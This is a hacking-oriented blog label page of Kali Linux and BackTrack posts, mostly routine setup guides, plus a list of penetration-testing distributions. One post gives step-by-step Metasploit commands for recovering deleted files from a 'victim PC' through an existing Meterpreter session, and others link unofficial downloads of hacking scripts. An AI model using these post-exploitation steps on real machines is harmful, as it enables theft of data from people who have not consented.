Showing posts with label BackTrack. Show all posts
Showing posts with label BackTrack. Show all posts

HackPack - Collection of Hacking Scripts for Kali Linux


This is a collection of scripts to add to kali linux. It will create a new menu named HackPack in your applications menu. It should work on any flavor of Debian, Ubuntu etc. But is made mainly for Kali along with LazyKali. This script will also add launchers for various programs installed by #LazyKali

Download Link
http://www.toofile.com/eafxq4654jfm/lazykali.sh.html

How To Install Angry IP Scanner in Kali Linux (32/64-Bit)


Angry IP Scanner (or simply ipscan) scanner is open-source and cross-platform designed to be fast and simple to use network. It scans IP addresses and ports as well as has many other features.   It is widely used by network administrators and just curious users around the world, including large and small enterprises, banks and government agencies.   It runs on Linux, Windows and Mac OS X, possibly supporting other platforms.
Download Link

http://www.toofile.com/eafxq4654jfm/lazykali.sh.html

BackTrack Dual Booting with Windows 8.1 || Black Screen After Startx Solved



Hello readers! Today I am posting this post because I have faced this problem recently while using BackTrack Linux. I made a bootable linux usb and booted using it. Everything went okay until I wrote the command "Startx" for entering GUI of BackTrack R3; my screen went blank/black. Not any GUI items were displayed, neither mouse pointer; any keys of keyboard was not functioning. I than directly turned off my laptop pressing power button for few seconds. I solved the problem.
I installed the BackTrack and loaded my BackTrack. But the problem arised again.

I than booted my laptop using "Ubuntu" and started to search it's solution too and I eventually found the solution to it.

SOLUTION:


Now, your problem is solved.
Thank you!
Please share, like and tweet this post.

How To Change Hostname & Hosts in Kali Linux


When installing kali, you get to choose a hostname, but in case you accepted the default hostname (kali) and later want to change it, here’s a How to guide to change hostname in Kali Linux.

Step 1: edit hostname file

Open hostname file from /etc directory and modify the name in there.
nano /etc/hostname
Save the file.

Step 2: edit hosts file

Open hosts file from /etc directory and modify the name in there.
nano /etc/hosts
Save the file.

Step 3: reboot

Now reboot to reflect your changes
reboot
And you should see the new hostname coming up in terminal (i.e. root@iExplo1t)

How To Install Wine in Kali Linux 64-bit


Wine lets you run Windows software on other operation systems. With Wine, you can install and run these applications just like you would in Windows. Wine enables Linux, Mac, FreeBSD, and Solaris users to run Windows applications without a copy of Microsoft Windows. Wine is free software under constant development. Other platforms may benefit as well.

Search for wine in your package cache using the aptitude command. We are doing it on a 64bit debian system.
So now following the instructions showed in that dialog. Run the commands in exact sequence
# dpkg --add-architecture i386
# apt-get update
Now if you search wine, it will show the additional 32bit packages
Now go ahead and install wine:i386 package.
# apt-get install wine:i386
It will download around 105MB, depending on what packages are already installed on your debian system.
After installation run again to confirm that its installed properly
# wine --version
wine-1.4.1
As we can see, we just installed wine 1.4.1 Now in the application menu, somewhere you would find a Wine Configuration option. Click it and a window like this should popup.



Wine Theme 1

Wine Theme 2


How To: Fix the GPG error in updater "NO_PUBKEY"


For who have this problem (NO_PUBKEY)

root@kali = gpg --keyserver pgp.mit.edu --recv-keys THEKEY
root@kali = gpg --armor --export THEKEY | apt-key add -


How To Install Aircrack-GUI in Kali Linux & BackTrack


In This Tuto i'll show you how to install AirCrack-GUI in Kali Linux




https://mega.co.nz/#!tVNDDBKC!NJRJtvooNGI7TaN4J1pgCZ9KkD1N_-REtrgTmEQChjA

How To Fix Sound in Kali Linux & Backtrack


In this video, I'll show you how to fix common audio issues and problem with Kali Linux & BackTrack. If you should have any questions or comments, feel free to send me a message or comment below.




Commands used in this video

Kali Linux

@ sudo killall pulseaudio

@ sudo apt-get purge pulseaudio-utils gstreamer0.10-pulseaudio paman pavumeter pavucontrol

@ rm ~/.pulse-cookie

@ rm -r ~/.pulse

@ sudo apt-get install alsa-base alsa-tools alsa-tools-gui alsa-utils alsa-oss alsamixergui libalsaplayer0

@ reboot

@ apt-get install kmix


 
BackTrack

1-pulseaudio

 
2-/usr/bin/pulseaudio

 
3-start the sound

Top 11 things to do after installing Kali Linux 2.0


I’ve compiled a small list of things that I always perform after installing a fresh copy of Kali Linux in this post. Let me know via comments section. You can comment without registering.. so that’s an easy way to give me feedback and opinion.


1. Fix default repository

The simplest way is to edit the /etc/apt/sources.list remove or comment every-line with # at the front and add the following lines..
 leafpad /etc/apt/sources.list
Comment or remove existing config with the following lines:

# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

Save and close the file.

Clean your apt-get => apt-get clean
Do an apt-get update => apt-get update
Do an upgrade => apt-get dist-upgrade
Save and close the file.


2. Update, Upgrade, Dist-Upgrade

Clean, update, upgrade and dist-upgrade your Kali installation.
 apt-get update && apt-get dist-upgrade -y

3. Fix Sound ===> Click Here


4. Install Java ===> Click Here


5. Install Flash ===> Click Here


6. Install Tor ===> Click Here


7. Install a New Desktop Environment ===>
Click Here


8. Enable Autologin user ===> Click Here

 

Conclusion


Hope you’ve found these useful. You might not have to use all of these, but some are definitely recommended. Thanks for reading. Please share.

Recover Deleted Data from Remote Victim PC Using Meterpreter


This module list and try to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Let it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. “PNG”) to recover deleted files with that extension. Or set FILES to a command separated list of IDs (from enumeration) to recover those files. The user must have into account file enumeration and recovery could take a long time, use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).

Run the following command to list all the drives of victim PC
Now type 1 = background
Now type 2 = use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit


Run the following command to recover the deleted data of the Victim PC
(I am using E: drive in my case)
Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive E:
msf exploit (recovery_files)>exploit
Run the following command to save the deleted data on /root/.msf4/loot
Set files ID
(Exp: Set files 1073775554)
Set files 1073775554Set files 1073788888

Or

Set files ID,ID,ID
EXP:Set files 1073775554,1073788888,1073222212

TOP 13 PENETRATION TESTING LINUX DISTRIBUTIONS

[Source: concise-courses.com]

OK, none of the following Pentesting distributions were in the top 100 list over at Distro Watch but we don’t care – we are talking about penetration testing tools – or specifically the creation of distro’s that have all the necessary  open source tools that help ethical hackers and penetration testers do their job. Like everything else when it comes to choices, every pentesting distro has its own pros, cons and specialty. Some distro for example are better at web application vulnerability discovery, forensics, WiFi cracking, reverse engineering, malware analysis, social engineering etc.

1. Kali Linux
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Kali Linux can be run from a hard disk, live CD, or live USB. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.
Kali Linux is distributed in 32- and 64-bit images for use on hosts based on the x86 instruction set, and as an image for the ARM architecture for use on the Raspberry Pi computer and on Samsung's ARM Chromebook.
9. BackTrack 5R3

The mamma or best known of Linux pentesting distros. BackTrack has a very cool strapline: “The quieter you become, the more you are able to hear.” That just sounds cool….
BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be only available within a KDE environment but Gnome become was added as an option with the release of BackTrack v5. For those working in Information Security or intrusion detection, BackTrack is one of the most popular pentesting distros that can run on a live CD or flash drive. The distribution is ideal for wireless cracking, exploiting, web application assessment, learning, or social-engineering a client.
Here is a list of some of the awesome tools available in BackTrack 5r3 (the latest release).
To identify Live Hosts:
dnmap – Distributed NMap
address6 – (which acts as a IPV6 address conversion)
Information Gathering Analysis (Social Engineering)
Jigsaw – Grabs information about company employees
Uberharvest – Email harvester
sslcaudit – SSL Cert audit
VoIP honey – VoIP Honeypot
urlcrazy – Detects URL typos used in typo squatting, url hijacking, phishing
Web Crawlers
Apache_users – Apache username enumerator
Deblaze – Performs enumeration and interrogation against Flash remote end points
Database Analysis
Tnscmd10g – Allows you to inject commands into Oracle
BBQSQL – Blind SQL injection toolkit
* If you are interested in Database Security see our Hacker Halted summary here.
Bluetooth Analysis
Blueranger – Uses link quality to locate Bluetooth devices
Vulnerability Assessment
Lynis – Scans systems & software for security issues
DotDotPwn – Directory Traversal fuzzer
Exploitation Tools
Netgear-telnetable – Enables Telnet console on Netgear devices
Terminator – Smart Meter tester
Htexploit – Tool to bypass standard directory protection
Jboss-Autopwn – Deploys JSP shell on target JBoss servers
Websploit – Scans & analyses remote systems for vulnerabilities
Wireless Exploitation Tools
Bluepot – Bluetooth honeypot
Spooftooph – Spoofs or clones Bluetooth devices
Smartphone-Pentest-Framework
Fern-Wifi-cracker – Gui for testing Wireless encryption strength
Wi-fihoney – Creates fake APs using all encryption and monitors with Airodump
Wifite – Automated wireless auditor
Password Tools
Creddump
Johnny
Manglefizz
Ophcrack
Phrasendresher
Rainbowcrack
Acccheck
smbexec

3. NodeZero.
Like BackTrack, NodeZero is an Ubuntu based distro used for penetration testing using repositories so every time Ubuntu releases a patch for its bugs, you also are notified for system updates or upgrades. Node Zero used to be famous for its inclusion of THC IPV6 Attack Toolkit which includes tools like alive6, detect-new-ip6, dnsdict6, etc, but I think that these days BackTrack 5r3 also includes these tools.
Whereas BackTrack is touted as being a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) state that the distros real strength comes from a hard install. NodeZero, in their own words, believe that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable Linux environment. Sounds cool. Ever tried it? Let us know in the comments below.

4. BackBox Linux
BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pentesting distro that is fast and easy to use. BackBox does have a pretty concise looking desktop environment and seems to work very well. Like the other distros BackBox is always updated to the latest stable versions of the most often used and best-known ethical hacking tools through repositories.
BackBox has all the usual suspect for Forensic Analysis, Documentation & Reporting and Reverse Engineering with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.

5. Blackbuntu.
Yes, as the name clearly suggests, this is yet another distro that is based on Ubuntu. Here is a list of Security and Penetration Testing tools – or rather categories available within the Blackbuntu package, (each category has many sub categories) but this gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensic, Reverse Engineering and a Miscellaneous section. This list is hardly revolutionary but the tools contained within might be different to the other distros.

6. Samurai Web Testing Framework.
This is a live Linux distro that has been pre-configured with some of the best of open source and free tools that focus on testing and attacking websites. (The difference with Samurai Web Testing Framework is that it focuses on attacking (and therefore being able to defend) websites. The developers outline four steps of a web pen-test. These steps are incorporated within the distro and contain the necessary tools to complete the task.
Step 1: Reconnaissance – Tools include Fierce domain scanner and Maltego.
Step 2: Mapping – Tools include WebScarab and ratproxy.
Step 3: Discovery – Tools include w3af and burp.
Step 4: Exploitation – Tools include BeEF, AJAXShell and much more.
Of interest as well, the Live CD also includes a pre-configured wiki, set up to be a central information store during your pen-test.
The Samurai Web Testing Framework is a live Linux distro that focuses on web application vulnerability research and web pentesting within a “safe environment” – i.e. so you can ethical hack without violating any laws. This is a pentesting distro recommended for penetration testers who wants to combine network and web app techniques.

7. Knoppix STD.
This distro is based on Debian and originated in Germany. The architecture is i486 and runs from the following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been around for a long time now – in fact I think it was one of the original live distros.
Knoppix is primarily designed to be used as a Live CD, it can also be installed on a hard disk. The STD in the Knoppix name stands for Security Tools Distribution. The Cryptography section is particularly well-known in Knoppix.


8. Pentoo.

Pentoo is a security-focused live CD based on Gentoo. In their own words “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Pentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a Hardened Kernel with aufs patches, Backported Wifi stack from latest stable kernel release, Module loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking support with development tools.




9. WEAKERTH4N.
This penetration distribution is built from Debian Squeeze and uses Fluxbox for its’ desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking since it contains many Wireless tools. Here is a quick summary of WEAKERTH4N’s tool categories: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing, Android Hacking, Networking and Shells.


10. Matriux Krypton.
This linux distro is, I believe, is the first security distribution based directly on Debian, (after WEAKERTH4N?) if I am wrong please comment below! There are 300 security tools to work, called “arsenals”. The arsenals allow for penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations,  exploiting, cracking and data recovery. The last category, data recovery, doesn’t seem to be prevalent in the other distros.

11. DEFT.
The latest version is DEFT 7 which is based on the new Linux Kernel 3 and the DART (Digital Advanced Response Toolkit). This distro is more orientated towards Computer Forensics and uses LXDE as desktop environment and WINE for executing Windows tools under Linux. The developers, (based in Italy) hope that their distro will be used by the Military, Police, Investigators, IT Auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit”

12. CAINE
A reader to our blog suggested to add CAINE which we duly have. CAINE Stands for Computer Aided Investigative Environment, and like many information security products and tools – it is Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools that are composed as software modules, all displayed within a friendly graphical interface. CAINE states to have three objectives. These are, to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation. Secondly that the distro has a user friendly graphical interface and finally that it provides a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open-source.
If anyone has used this please let us know.

13. BugtTraq
Bugtraq is another reader submitted pentesting distro. Based on the 26.6.38 kernel, this distro offers a really wide range of penetration and forensic tools. Like most of the others in this list, Bugtraq can hard-install of obviously run as a Live DVD or from a USB drive. Bugtraq claims to have recently configured and updated the kernel for better performance but also importantly so that it can recognize more hardware, including wireless injection patches pentesting. The team at Bugtraq seem solid because they are clearly making an effort to get the kernel to work with more hardware – something which the other distributions don’t always place enough importance.
Some of the special features included with Bugtraq include (as stated) an expanded range of recognition for injection wireless drivers, (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.
Unique to Bugtraq (as claimed on their site) is the ability to, or better said, ease, of deleting tracks and backdoors. Just by having read about Bugtraq I’m really glad that I can add this to the list because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Buqtraq: Malware, Penetration Shield, Web audit, Brute force attack, Communication and Forensics Analytics, Sniffers, Virtualizations, Anonymity and Tracking, Mapping and Vulnerability detection.
Quick Summary: You can’t go wrong with any Ubuntu based distro. BackTrack does the job well but I guess, of course, it’s all personal – i.e. does the distro do the job for you? Every penetration tester needs a lean towards a particular tool or tool-set. Frankly they are all good, and it would be prudent to use several of these pentesting distros as live versions. For WiFi hacking then WEAKERTH4N is likely your better friend, whilst to stay within the law, use Samurai.
Bugtraq looks really good – the team behind it seems to have taken considerable time to tick all the boxes. Once we test it I’ll update the post.
Here is a list of other distros (which we think are still alive and kicking – please correct us if we are wrong).

sharethis

 

Copyright @ 2024 iExplo1t | Developed by AuresExpress.com